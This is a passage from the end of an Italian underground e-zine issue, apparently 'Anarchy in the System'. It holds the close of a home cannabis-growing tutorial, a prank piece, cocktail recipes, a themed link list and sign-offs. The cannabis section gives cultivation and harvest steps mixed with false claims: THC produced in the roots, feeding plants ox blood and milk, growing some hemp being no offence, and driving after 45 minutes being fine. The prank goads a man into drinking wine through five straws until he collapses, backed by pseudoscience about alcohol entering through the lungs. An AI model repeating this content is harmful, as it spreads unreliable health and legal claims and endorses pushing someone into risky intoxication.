- I fiori vanno verso il | - I fiori vanno verso l'alto e crescono solo |
basso | sulle estremità della pianta e sono |
| circondati da foglioline |
- I boccioli sembrano delle | |
vongole | |
- Si nota un colorito biano | |
nei boccioli | - I boccioli sono pelosi |
-----------------------------------------------------------------------------

Le possibilità che la pianta sia femmina o maschio "dovrebbe" essere la
stessa, fatto sta che a me su 7 piante (3 morte) solo 1 è maschio :).
Appena vedrete la pianta bella forte potrete togliere qualche foglia, ma non
esagerate perchè se vedete la pianta con molte foglioline piccole vuol dire
che avete raccolto troppo e sta per morire, quindi meglio moderarsi che
ucciderla. In questa fase conviene tenere il maschio da un'altra parte,
quella che si fuma è la femmina, ma se coltivato bene il maschio ha contenuti
di THC (il principio attivo) piuttosto alti ed estremamente vicini a quelli
della femmina, quindi non buttatela visto che vi servirà per i semi.

-== Quinta fase ==-

Le specie di cannabis sono varie, la cannabis italica è differente perchè le
foglie hanno delle punte molto molto lunghe che difficilmente arrivano a
sette, ma anche questa canapa italica (i semi li trovate nei negozi come
mangime per piccioni) se ben coltivata ha contenuti di THC che arrivano anche
a 2.5/3 (il massimo è 4 e 3 è un contenuto molto alto) quindi se scoprite di
avere cannabis italica in casa:
rilassatevi perchè non state commettendo reato :) e poi coltivatela bene
perchè sarà ottima.

La specie che dovremmo avere noi si chiama Cannabis Sativa variante Indica, è
la più potente ed oltretutto fa piante basse ma molto molto folte :)),
generalmente a fine crescita si possono ottenere circa 700-750g tra foglie e
fiori.
Ad ogni modo la Cannabis resta sempre un'erbaccia perciò in questa fase
crescerà molto molto velocemente fino ad oltrepassare i 2.5m (ma ci vogliono
almeno 5-6 mesi), appena vedete i fiori sulle punte rosse fateli crescere e
quando saranno appena sbocciati tagliateli tutti, rinasceranno ancora, il
procedimento va ripetuto massimo 3 volte e se in questo frangente di tempo
avrete l'accortezza di innaffiare poco la pianta allora la resina
salirà tutta verso l'alto.

Appena tagliati i fiori date molta acqua alla pianta e soprattutto
fertilizzatela (non eccedete o brucerete le radici).
I fiori li farete seccare e poi li fumerete....Li mangerete, saranno fatti
vostri.
Vi dico una cosa che un po' vi irriterà, la parte più forte della pianta
non la possiamo fumare perchè è una sostanza che contiene quasi totalmente
THC che è altamente volatile e praticamente evapora appena la pianta lo
emette :(((.

Se poi invece di cogliere i fiori 3 volte lo farete solo due.....Allora alla
terza riavvicinate il maschio e fate fare i semi...Raccoglietene 10-20 e
teneteli in un luogo fresco e asciutto. Gli altri lasciateli maturare che
daranno un frutto con molto THC dentro :))).

Appena la pianta inizia ad emettere polline avrà già perso il 10% della sua
potenza quindi occhio.

-== Riassunto ==-

1) Cercate i semi e prendete solo quelli che sono scuri e resistono
ad una leggera pressione
2) Fateli germogliare, manteneteli al sole ed al caldo e sempre con abbondante
acqua
3) Dopo 10 giorni piantateli in un grosso vaso che conterrà solo terra per
piante grasse (ricordatevi di farla riposare) annaffiatele ogni 5-6 giorni
e dategli un cucchiaino di latte per litro di acqua, mai il sangue di bue
4) Arrivate a 20gg di vita mettele fuori nel QuePack (i buchi) e continuate a
dargli un d'acqua
5) Arrivate a 20-25cm cacciatele dal QuePack, ora capirete se sono maschio o
femmina ed alternate ogni 8 giorni sangue e latte
6) Allontanate il maschio e divertitevi :))))

-== Considerazioni ==-

- Una canna fa meno male di una sigaretta, il tabacco è altamente tossico
- La parte che produce THC (TetraIdroCannabinolo) sono le radici NON le
foglie (fumate tutto :)
- La cannabis ha una lieve (ma non pericolosa) tossicità che può dare mal di
testa, se innestate del luppolo (luppolo e cannabis fanno parte della stessa
famiglia) non avrete problemi con i vicini ed il luppolo è totalmente
atossico, questa sarebbe la soluzione migliore.
- Offrite la vostra erba agli amici, vendere droga è anche una questione di
etica, è meglio vivere nella filosofia del Peace&Love (IMHO), non c'è
bisogno di dover far soldi su tutto
- Non vi venga in mente di farvi da soli l'Hashish, probabilmete non ci
riuscirete mai.
- Non guidate dopo una canna, aspettate almeno 45min, i tassi di incidente
per cannabinoidi sono altissimi ed inoltre vi becchereste una poco sana
denuncia.
- La pianta della maria è incredibilmente simile alla Passiflora ed all'Acero
Cinese

-== Disclaimer ==-

Io non coltivo ne faccio uso di alcuna droga, non mi prendo nessuna
responsabilità per ciò che ho scritto su questo tutorial, ho appreso codeste
conoscenze da Quark, dalla maglietta che ho comperato ad Amsterdam,
dall'enciclopedia Treccani, quella di HighGrow e da un libretto che dei
Punkabbestia mi hanno regalato. Ad ogni modo sono stato forzato a studiare
questa materia da gente che mi ha obbligato ferocemente, è stata una congiura
verso di me e codesta gente mi ha usato in modo subdolo per i loro scopi.

Non cercate codeste persone, non sono di questo pianeta e dubito le
ritroverete. Non ho mai visto una pianta di Maria, le mie magliette mi sono
arrivate da un'ammiratrice segreta e cmq sono appositamente contraffatte di
modo che in nessun caso potrei riconoscere una pianta se la dovessi incontrare
sventando così il pericolo di "voler fumare", se dovesse succedere qualcosa
vuol dire che ho confuso quelle piante con quelle di tabacco o sono stato
costretto a fumare tale roba o ancora non ne ero al corrente.

-== Credits ==-

Grazie al Piè per il suo libretto, grazie al coder di HighGrow che ha fatto
una enciclopedia fantastica ma una protezione del cazzo al programma, grazie
a Piero Angela per i suoi dotti insegnamenti, grazie al Tunisino che al forte
ha evitato di violentarmi per avergli preso delle foglie, grazie a Dio ho
finito questo tutorial.

Un fuck a quello/a stronzo/a che mi ha fregato il fogliolone di maria
all'HackMeeting, morirai di cancro alla mano.

Ciauzzzzz, Peace&Love, Happy Smoking, Sex&Zen

Spp/Member
UIC Owner
www.uic-spippolatori.com
UIC@mail.usa.com

[ Quequero ]


.----------------------------------------------------------[ alcHolIkS ]-----.
| DOLORI DA VINO... |
*--------------------------------[ Maggiorana ]--[maggiorana@tiscalinet.it]--*

Ovvero...
"COME DIVERTIRSI DURANTE LE SERATE ESTIVE CON UNO SPACCONE
CHE FA' IL COGLIONE..."

AUTORE:MAGGIORANA
sITO :http://members.xoom.it/maggiorana

Risorse per fare sta cagata:
1 merendino mister day - marlboro light - caffè borghetti-
tempo sottrrratttoooo all'ufficio.

Allora ragazzi salve a tutti.
Questa volta voglio dirvi una cosa che mi è stata tramandata dal passato, non
ci azzecca un cazzo con IT ma funziona meglio di qualsiasi OS.

Dunque siamo in estate, e chi in estate non è stato in una di quelle feste
dove ci sono tante donzelle in abiti succinti che solo a guardarle senti
fortissimo, il desiderio di dare la testa al muro perchè la danno agli altri
e non a te?

NON FATE I MACHI "TUTTI E DICO TUTTI" o a voi è andata sempre bene.

Mi scuso con le gentili lettrici, ma visti la parità dei sessi il discorso
vale all'inverso.

Tanto ormai siamo liberi no?
Ok basta cazzate.

Siamo a questa splendida festa magari in piscina, magari c'è lei, magari ci
fila!

Arriva lui con un grosso pacco ma non davanti, ma dietro. appena entrato
"Ciao bella!!!!" e comincia a vantarsi della sua moto, della sua palestra, di
tutto quello che cazzo gli viene in mente.

Voi prendetvi un bicchiere di vino rosso, fatevi notare da lui offritegliene
uno con gentilezza e.....TADA!!!!

Si vanterà di essere un intenditore.
Allora voi rivolgetevi a lui con tono polemico ma sempre gentile
contravvenendo a ciò che dice. qualunque cosa sia ma fatelo con gentilezza e
garbo.

Lui che non vuole fare la figuraccia vi risponderà "fate in modo che sia lui
a far salire il tono del discorso"
Poi ditegli: "Secondo me non ti bevi 1 bicchiere di vino uno solo senza
andare lungo."

Il pollo e troppo pieno di sè per dire no, ma siccome fondamentalmente è
coglione dirà:

No tu ci metti qualcosa dentro o chissa che mi fai bere.

allora voi: La bottiglia la scegli tu purchè rossa e a temperatura ambiente,
tu la stappi, sempre tu ti versi il vino nel bicchiere l'unica cosa che ti
chiedo e di berlo con 5 CANNUCCE.

Davanti a queste affermazioni il coglionazzo non potrà rifiutare
"Non dimenticate che lei è li a guardarlo"
ed allora il rito inizia.

Dopo avergli fatto scegliere il vino, dopo che se lo è versato, fategli
aprire le cannucce, fategliele mettere nel bicchiere. "fate fare tutto a lui
mi raccomando o diranno che siete bastardi".

Poi come avevamo detto all'inizio fateglielo bere tutto di un fiato con tutte
le 5 cannuce in bocca.
Poi chiedetegli come si sente lui dirà BENE!! ma vedrete che appena si alza
cadrà in terra ubriaco come se avesse bevuto una botte.

SPIEGAZIONE: NONSTANTE IL VINO SIA POCO RICORDATE SEMPRE CHE è CMQ UNA
BEVANDA ALCOLICA, ED IL SUBDOLO E' PROPRIO LI.

METTENDO LE 5 CANNUCCE IN BOCCA E SUCCHIANDO IL VINO, O SI è PARENTI DI
MENNEA O NESSUNO IN GENERE HA IL FIATO PER TIRARLO SU TUTTO. qUINDI LO BERRA'
IN PIU' SORSI, IL BELLO E' CHE NELL'INTERVALLO DI TEMPO CHE INTERCORRE TRA'
LE SUCCHIATONE NELLA CANNUCCIA SI FORMANO DELLE MICIDIALI BOLLE D'ARIA CHE
OVVIAMENTE SONO ALCOLICHE.

QUESTE PASSANDO DIRETTAMENTE PER I POLMONI " E NON PER L'APPARATO DIGERENTE"
ARRIVANO AL CERVELLO CON UNA VELOCITA' IMPRESSIONANTE.
IL RISULTATO E' INNOQUO MA GIURO CHE IL COGLIONAZZO STRAMAZZA AL SUOLO TIPO
WILLY COYOTE-

DISCLAIMER:
IO NON VI HO DETTO NIENTE, E SE IL MALCAPITATO SCIUMERA' LITRI DI VOMITO IO
NON VOGLI SAPERNE NULLA, IN SPECIAL MODO SE E' GROSSO CATTIVO E MANESCO.
;PpPpPpPp

[ Maggiorana ]

.----------------------------------------------------------[ alcHolIkS ]-----.
| ALCOOL E COCKTAILS (PARTE 2) |
*--------------------------------------------[ SiX ]--[devilsix98@yahoo.it]--*

Introduzione: Non avevo molta voglia di scrivere questo articolo perché mi
sembra molto scemo,...ma che cazz.
Il testo ke ho scritto è dedicato alla mia ragazza Claudia: 6 magnificaaaaa !!
Uno speciale ringraziamento è a Zapotecz !!!

Ecco a voi alcuni esempi di come fare i più famosi COCKTAIL così vi potete
sbizzarrire nei vostri momenti di relax...
Non mi ritengo responsabile se fate incidenti o altre cazzate...io mi tiro
fuori da tutto!!!

Bentley
Cosa serve :
- 1/2 Acquavite di mele
- 1/2 Rosso Antico
Dove:
Nello shaker con ghiaccio
Preparazione:
Agitare bene e servire in un bicchiere da cocktail.

Blue Moon
Cosa serve :
- 50% Brandy Invecchiato
- 40% Crema di Violetta
- 10% Menta Verde
Dove:
Nello shaker.
Preparazione:
Prepararlo nello shaker agitando vigorosamente e servirlo in un bicchiere
tumbler medio.

Brandy Sangree
Cosa serve :
- 1 cucchiaino di zucchero in polvere
- 1 cucchiaino di acqua minerale fredda
- 1 bicchierino di brandy
Dove:
Nello shaker pieno per 1/4 di ghiaccio in polvere
Preparazione:
Agitare bene nello shaker e versare in un bicchiere a stelo. Servire dopo
aver spruzzato di noce moscata.

Crazy Horse Special
Cosa serve :
- 1 bicchierino di scotch whisky
- 2 sorsi di Gran Marnier
- Succo di mezza arancia
- Acqua tonica
Dove:
In un tumbler grande pieno a metà di ghiaccio in polvere
Preparazione:
Mescolare bene il tutto con un cucchiaio lungo e completare con acqua tonica
freschissima.

Crocker
Cosa serve :
- 1/5 Vermut secco
- 4/5 Dry Gin
Dove:
Nello shaker con abbondante ghiaccio in polvere
Preparazione:
Agitare bene e servire molto ghiacciato in un bicchiere da doppio cocktail.

Frappé café Royal
Cosa serve :
- 1/4 Brandy
- 3/4 Cafè espresso
Dove:
Nello shaker con un po' di ghiaccio in polvere
Preparazione:
Si agita bene e si serve in un bicchiere da cocktail.

Gin Rickery
Cosa serve :
- 1 bicchierino Gin
- Succo di mezzo limone verde
Dove:
Direttamente in un bicchiere tumbler con tre cubetti di ghiaccio.
Preparazione:
Mescolare bene e passare in un tumbler medio completandolo con soda fresca.
Decorare con una fettina di limone. Servire.

Gin Sour
Cosa serve :
- 9/12 Dry Gin
- 2/12 Succo di limone
- 1/12 Sciroppo di Zucchero
- 1 ciliegia
Dove:
Nello shaker con un po' di ghiaccio in polvere
Preparazione:
Agitare bene. Versare in un bicchiere delmonico. Decorare con una fettina di
arancia e servire con una ciliegia immersa.

Scotch Mist
Cosa serve:
- Bicchierino Scoth Whisky
- 1 fetta di limone
Dove:
Nello shaker con 3 cubetti di ghiaccio
Preparazione:
Agitare bene. Versare in un bicchiere da vino spumante. Aggiungete una
buccia di limone e servire con delle cannucce.

Orange Blossom
Cosa serve:
- 1/2 Dry Gin
- 1/2 Succo di Arancia
Dove:
Nello shaker con un po' di ghiaccio
Preparazione:
Agitare bene. Versare in un bicchiere da doppio cocktail. Servire con buccia
d'arancia immersa o mezza fettina.

Montecarlo Imperial cocktail
Cosa serve:
- 1/2 Dry Gin
- 1/4 Crema di menta bianca
- 1/4 Succo di limone
- Spumante
Dove:
Nello shaker con abbondante ghiaccio in polvere
Preparazione:
Agitare bene. Versare in un bicchiere da spumante. Completare con vino
spumante fresco.

Martini Sweet
Cosa serve:
- 2/3 Dry Gin
- 1/3 Vermut Rosso
Dove:
Nel mixing-glass con un po' di ghiaccio in polvere
Preparazione:
Mescolare con forza. Versare nella coppetta. Servire.

Planter's Punch
Cosa serve,preparazione:
Mettete del ghiaccio tritato in un bicchiere alto,aggiungere 2 once di Rum
Bianco, 1/2 succo di limone e alcune gocce di sciroppo di Granatina.
Riempire il bicchiere con soda e mescolare. Guarnire con una fetta d'arancio
e con uno spicchio di ananas.


Questo è quanto...se non vi è piaciuto questo articolo non me lo dite, è
meglio che vi state zitti :))
Ciao e buone vacanze da SiX

[ SiX ]

.----------------------------------------------------------------------------.
| HOTWEB by ]CyBOrG[ |
*----------------------------------------------------------------------------*


-------
-------

http://www.exibart.com/ [Portale artistico -ITA-]
http://www.undo.net/ [Portale artistico -ITA]
http://www.nicolarandone.com/arte/ [I miei pittori preferiti -ITA-]
http://www.opkamer.nl/amea/index.shtml [Arte erotica -ENG-]
http://www.eroticart.nu [Hentai -ENG-]
http://www.rotten.com/ [Chiamala arte... -ENG-]
http://www.dude.it/ [Satirico -ITA-]
http://www.aenigmatica.it/ [Enigmistica -ITA-]
http://www.subliminale.it/ [Messaggi subliminali -ITA-]
http://digilander.iol.it/subliminale/ [Messaggi subliminali -ITA-]
http://www.studionet.it/mori/balist/balist.htm [Balistica -ITA-]
http://www.skatemap.it/ [Skate board -ITA-]
http://chesslive.com/ [Gioca a scacchi virtualmente -ENG-]
http://sms.clarence.com/ [Loghi nokia -ITA-]
http://gdr.net/ [Giochi di ruolo -ITA-]
http://gens.labo.net/ [Alberi genealogici -ITA-]
http://utenti.tripod.it/razzimodellismo/ [Razzimodellismo -ITA-]
http://www.eskeletons.org/ [Foto di scheletri -ENG-]
http://www.35mm.it/home/ [Recensione film -ITA-]
http://www.bambinidisatana.com/ [Bambini di satana -ITA-]
http://www.cicap.org/ [Paranormale -ITA-]
http://www.monasterozen.it/home.htm [Buddhismo zen -ITA-]
http://www.andreamonti.org/ [Cyberlaw -ITA-]
http://www.interlex.it/ [Cyberlaw -ITA-]
http://www.internos.it/ [Cyberwork -ITA-]
http://www.ludus.it/ [Videogames -ITA-]
http://www.alice.it/ [Database pubblicazioni -ITA-]
http://utenti.tripod.it/nellozucca/ [Poeti maledetti -ITA-]
http://www.churchofeuthanasia.org/ [Eutanasia -ENG-]
http://www.thanatos.it/ [Portale della morte -ITA-]
http://www.allmusic.com/ [Recensioni album e gruppi -ENG-]
http://members.xoom.it/IctrlU/ [Privacy -ITA-]
http://www.grr.rai.it/golem/ [Programma radio interessante -ITA-]
http://www.kyuzz.org/radiocybernet/ [Radio Cybernet -ITA-]
http://www.barzellette.it/ [Ridere... -ITA-]
http://utenti.tripod.it/DrZap/ [Ridere... Ridere... -ITA-]
http://www.freeweb.org/personali/gandalf/ [Per i pessimisti -ITA-]
http://drhibbert.scintilla.it/ [Video dei simpsons -ITA-]
http://www.renudo.it/ [Rivista new age -ITA-]
http://www.filemazio.it/ [Scienza&c. -ITA-]
http://www.skuola.net/ [Per gli studenti -ITA-]
http://biblio.bo.cnr.it/schede/Indexit2.htm [Schede sicurezza -ITA-]
http://www.ecn.org/thingnet/frameset.html [Cyberpunk/Hacktivism -ITA-]
http://www.strano.net/copydown/ [NoCopyRight -ITA-]
http://antitesi.kyuzz.org/ [Underground/Drugs -ITA-]
http://www.acidlife.com/ [Indefinibile ;-) -ITA-]
http://www.ecn.org/loa/ [Hacklab -ITA-]
http://www.olografix.org/ [Associazione culturale telematica -ITA-]
http://italy.indymedia.org/ [Disinformazione -ITA-]
http://net-i.zkm.de/ [Net Institute -ITA-]
http://digilander.iol.it/kaxxo/italia/ [Droghe -ITA-]
http://www.kocaine.net/ [Droghe -ITA-]
http://www.kyuzz.org/lab00128/green/ [Droghe -ITA-]
http://www.strano.net/antipro/ [Droghe -ITA-]


]CyBOrG[
.----------------------------------------------------------------------------.
| LOSS TIME by OldirOn61 |
*----------------------------------------------------------------------------*

Loss time... tempo di recupero, il che vuol dire che anche questo numero di
AiS sta volgendo al termine. Spero di rivedervi molto presto, cercheremo di
non ripetere + questa lunga latitanza, e di proporvi un magazine sempre +
interessante. Per concludere vorrei salutare per la gentile collaborazione
(fisica e spirituale ;Pp) Dante, Nobo e tutto il newbies staff, il team di
spaghetti, i mitici spp e UIC, i "guru" del softpj, la ML di areasessantuno
che ci sta gentilmente "sopportando", quelli che becco quelle rare volte che
vado su irc, la mia mamma, il mio papa' e....TUTTI QUELLI CHE MI CONOSCONO.
(Sbirri Esclusi)


Un saluto da OldirOn61 e da tutto lo staff di Anarchy in the System

[ OldirOn61 ]


.Ï555.
.ÁÁÁÁÁ555555. ÎÎÎÎ55 .§§§§§§§§§§555.
A555' '555555 'III5' SS5555' 'SS55
Aà55 A55555 S$S555 S$S5
àAà5 àA5555 ì5555555 $S$s55.
.ààà555 ì'555555 '$$$$$$$$5555.
.àaàaàaàaà°55 ì55555 's55555
aaa555 aaaaa5 ii5555 ss5555
;;;;55 ;;;;;; ;;;555 ;;;555 ;;;555
,,,,,5 ,,,,,, .,,,,55. ',,,555 ,,,,55
'...........' .......55. '............5'


:: http://www.aisprod.net :: oldiron61@aisprod.net ::
:: http://aisprodml.cjb.net :: IRCnet #aisprod ::

.----------------------------------------------------------------------------.
| EOF ais4.txt (299 Kb) |
*----------------------------------------------------------------------------*

← previous
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos from Google Play

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT